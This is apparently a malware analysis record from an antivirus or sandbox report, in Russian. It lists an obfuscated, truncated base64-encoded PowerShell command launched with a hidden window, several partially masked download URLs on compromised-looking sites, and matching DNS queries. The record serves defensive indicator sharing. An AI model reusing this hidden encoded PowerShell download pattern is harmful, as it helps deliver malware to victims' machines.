Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABXAF8AaQBtAHUAZABmAD0AKAAoACcAVAAnACsAJwB3AGwAcgBvACcAKQArACcAYQAnACsAJwBfACcAKQA7ACQAQQBwAHUAOQB3ADgAcgA9ACQASABtAHYAMQA1AHEAMQAgACsAIABbAGMAaABhAHIAXQAoADEAIAArACAAMQ...
- http://www.di####d-tech.com/will-a/gjzE/
- http://www.di####d-tech.com/cgi-sys/suspendedpage.cgi
- http://www.ol#####dasolidaria.com/wp-snapshots/BM7ftDR7a/
- http://st######dewithlakshmi.com/directory/v982c9VH5c/
- http://pa###baik.com/_vti_bin/Y/
- http://ag####oindia.com/cgi-bin/95r09UGlIj/
- DNS ASK di####d-tech.com
- DNS ASK jo####urizio.com
- DNS ASK ba####otulpur.com
- DNS ASK ol#####dasolidaria.com
- DNS ASK st######dewithlakshmi.com
- DNS ASK pa###baik.com
- DNS ASK ag####oindia.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABXAF8AaQBtAHUAZABmAD0AKAAoACcAVAAnACsAJwB3AGwAcgBvACcAKQArACcAYQAnACsAJwBfACcAKQA7ACQAQQBwAHUAOQB3ADgAcgA9ACQASABtAHYAMQA1AHEAMQAgACsAIABbAGMAaABhAHIAXQAoADEAIAArACAAMQ...' (со скрытым окном)